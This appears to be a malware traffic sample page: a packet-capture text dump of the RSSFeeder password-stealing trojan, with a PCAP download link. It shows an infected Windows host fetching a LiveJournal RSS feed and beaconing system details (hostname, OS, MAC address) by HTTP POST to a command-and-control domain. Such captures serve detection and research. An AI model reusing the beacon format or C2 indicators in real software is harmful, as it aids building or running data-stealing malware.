RSSFeeder RSS Data Password Stealer Malware Trojan Traffic Sample PCAP Download

January 29, 2016

Download the RSSFeeder PCAP file: rssfeeder.pcap

2013-01-05 22:20:37.052653 IP 172.16.253.240.53 > 8.8.8.8.53: 53824+ A? huming386.livejournal.com. (43)
E..G…….x………5.5.3W..@………. huming386.livejournal.com…..
2013-01-05 22:20:37.052718 IP 172.16.253.240.53 > 4.2.2.2.53: 53824+ A? huming386.livejournal.com. (43)
E..G……………..5.5.3a..@………. huming386.livejournal.com…..
2013-01-05 22:20:37.088158 IP 8.8.8.8.53 > 172.16.253.240.53: 53824 1/0/0 A 208.93.0.128 (59)
E..W……………..5.5.C.v.@………. huming386.livejournal.com………………]..
2013-01-05 22:20:37.089454 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [S], seq 309795285, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0. @…~……]…y.P.w……p….:……….
2013-01-05 22:20:37.090471 IP 4.2.2.2.53 > 172.16.253.240.53: 53824 1/0/0 A 208.93.0.128 (59)
E..W……………..5.5.C…@………. huming386.livejournal.com………………]..
2013-01-05 22:20:37.164606 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [S.], seq 2593427291, ack 309795286, win 64240, options [mss 1460], length 0
E..,…….c.]…….P.y…[.w..`….@……..
2013-01-05 22:20:37.164661 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [.], ack 1, win 64240, length 0
E..(.”@…~……]…y.P.w…..\P…….
2013-01-05 22:20:37.164900 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [P.], seq 1:220, ack 1, win 64240, length 219: HTTP: GET /data/rss HTTP/1.1
E….#@…}……]…y.P.w…..\P…….GET /data/rss HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
Host: huming386.livejournal.com
Connection: Keep-Alive
2013-01-05 22:20:37.165028 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [.], ack 220, win 64240, length 0
E..(…….f.]…….P.y…\.w..P….”……..
2013-01-05 22:20:37.257283 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [P.], seq 1:1122, ack 220, win 64240, length 1121: HTTP: HTTP/1.1 200 OK
E…………]…….P.y…\.w..P…iL..HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

c.,.0.^.4j..J’a..B…5…i.’&…….
2013-01-05 22:20:37.310103 IP 172.16.253.240.53 > 8.8.8.8.53: 20742+ A? killme.98.shoptupian.com. (42)
E..F.&…..p………5.5.2w.Q…………killme.98
shoptupian.com…..
2013-01-05 22:20:37.310202 IP 172.16.253.240.53 > 4.2.2.2.53: 20742+ A? killme.98.shoptupian.com. (42)
E..F.’…..{………5.5.2..Q…………killme.98
shoptupian.com…..
2013-01-05 22:20:37.357728 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [P.], seq 1:1122, ack 220, win 64240, length 1121: HTTP: HTTP/1.1 200 OK
E…………]…….P.y…\.w..P…iL..HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

………..TKo.@…WL/…v….7.J………….xw.>……..CAPN.g……….h..j…(.T…5……….d/..N…..A0^)…[..,.[……..R.”…S..]!…..FCz…-1s]..+..-..n!.8..(^t3-..[…..X…..Rze..l..AB.)#.+f..ck……En..[.\..T..5.;-.h.a.o.{Q….q@…+.E..H.p…..t.. a….&1OWR…….j..mfD….”.pF..-%am`…{.E19…….^….#.A….A……n.\….P.&m9.{…6…..v….HL..WQ…..(*..\UbZ..kzi#..N”….^L@..4……3….. ….$^K4Z……a…}…?….d|~q….]_~……7{.&….7..W…..}..b..5.f….o._7..$*g..h.i.h<Sm.t..I5.D3!U).D.G..27{..D….v.b..pUJ…K….
c.,.0.^.4j..J’a..B…5…i.’&…….
2013-01-05 22:20:37.357755 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [.], ack 1122, win 63119, length 0
E..(.(@…~……]…y.P.w……P….”..
2013-01-05 22:20:37.861590 IP 8.8.8.8.53 > 172.16.253.240.53: 20742 1/0/0 A 216.83.45.18 (58)
E..V……………..5.5.B#.Q…………killme.98
shoptupian.com………………S-.
2013-01-05 22:20:37.862206 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [S], seq 3684689920, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.*@…J7…..S-..z.P……..p….]……….
2013-01-05 22:20:38.120232 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [S.], seq 918891572, ack 3684689921, win 64240, options [mss 1460], length 0
E..,………S-……P.z6.,4….`….Y……..
2013-01-05 22:20:38.120285 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 1, win 64240, length 0
E..(.,@…J=…..S-..z.P….6.,5P…….
2013-01-05 22:20:38.120504 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [P.], seq 1:392, ack 1, win 64240, length 391: HTTP: POST /orange/news.php HTTP/1.1
E….-@…H……S-..z.P….6.,5P….k..POST /orange/news.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:20:38.893525 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [P.], seq 176:219, ack 562, win 64240, length 43: HTTP
E..S………S-……P.z6.,….2P…Ci..<div id="0a552b5a4352">{'command':[]}</div>
2013-01-05 22:20:38.893551 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 219, win 64022, length 0
E..(.0@…J9…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.894802 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [FP.], seq 219, ack 562, win 64240, length 0
E..(………S-……P.z6.-….2P………….
2013-01-05 22:20:38.894836 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 220, win 64022, length 0
E..(.2@…J7…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.895009 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [F.], seq 562, ack 220, win 64022, length 0
E..(.3@…J6…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.895669 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [.], ack 563, win 64239, length 0
E..(………S-……P.z6.-….3P….
……..
2013-01-05 22:20:39.029234 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [R.], seq 220, ack 1122, win 0, length 0
E..(.4@…~……]…y.P.w……P…….
2013-01-05 22:21:36.829017 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [S], seq 403722902, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.5@…~……]…|.P..R…..p……………
2013-01-05 22:21:36.908327 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [S.], seq 1074720888, ack 403722903, win 64240, options [mss 1460], length 0
E..,…….V.]…….P.|@..x..R.`….L……..
2013-01-05 22:21:36.908368 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [.], ack 1, win 64240, length 0
E..(.7@…~……]…|.P..R.@..yP…. ..
2013-01-05 22:21:36.908572 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [P.], seq 1:313, ack 1, win 64240, length 312: HTTP: GET /data/rss HTTP/1.1
E..`.8@…}……]…|.P..R.@..yP….j..GET /data/rss HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 20 Dec 2012 03:31:19 GMT
If-None-Match: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
Host: huming386.livejournal.com
Connection: Keep-Alive
2013-01-05 22:21:36.908742 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [.], ack 313, win 64240, length 0
E..(…….Y.]…….P.|@..y..S.P………….
2013-01-05 22:21:37.008574 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [P.], seq 1:519, ack 313, win 64240, length 518: HTTP: HTTP/1.1 304 Not Modified
E……….R.]…….P.|@..y..S.P…….HTTP/1.1 304 Not Modified
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:50:05 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Accept-Ranges: bytes
X-Varnish: 1502254454 1495326149
Age: 33078
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

2013-01-05 22:21:37.330258 IP 172.16.253.240.1149 > 216.83.45.18.80: Flags [P.], seq 1:392, ack 1, win 64240, length 391: HTTP: POST /orange/news.php HTTP/1.1
E….>@…H……S-..}.P…Oz…P…S;..POST /orange/news.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:21:37.330400 IP 172.16.253.240.1149 > 216.83.45.18.80: Flags [P.], seq 392:562, ack 1, win 64240, length 170: HTTP
E….?@…I……S-..}.P….z…P….1..cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4941
2013-01-05 22:21:37.330437 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [.], ack 392, win 64240, length 0
E..(………S-……P.}z…….P…G_……..
2013-01-05 22:21:37.330580 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [.], ack 562, win 64240, length 0
E..(………S-……P.}z…….P…F………
2013-01-05 22:21:38.032142 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [P.], seq 1:176, ack 562, win 64240, length 175: HTTP: HTTP/1.1 200 OK
E…………S-……P.}z…….P…[-..HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jan 2013 05:48:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/css
2013-01-05 22:21:38.044176 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [P.], seq 176:219, ack 562, win 64240, length 43: HTTP
E..S………S-……P.}z…….P….8..<div id="0a552b5a4352">{'command':[]}</div>
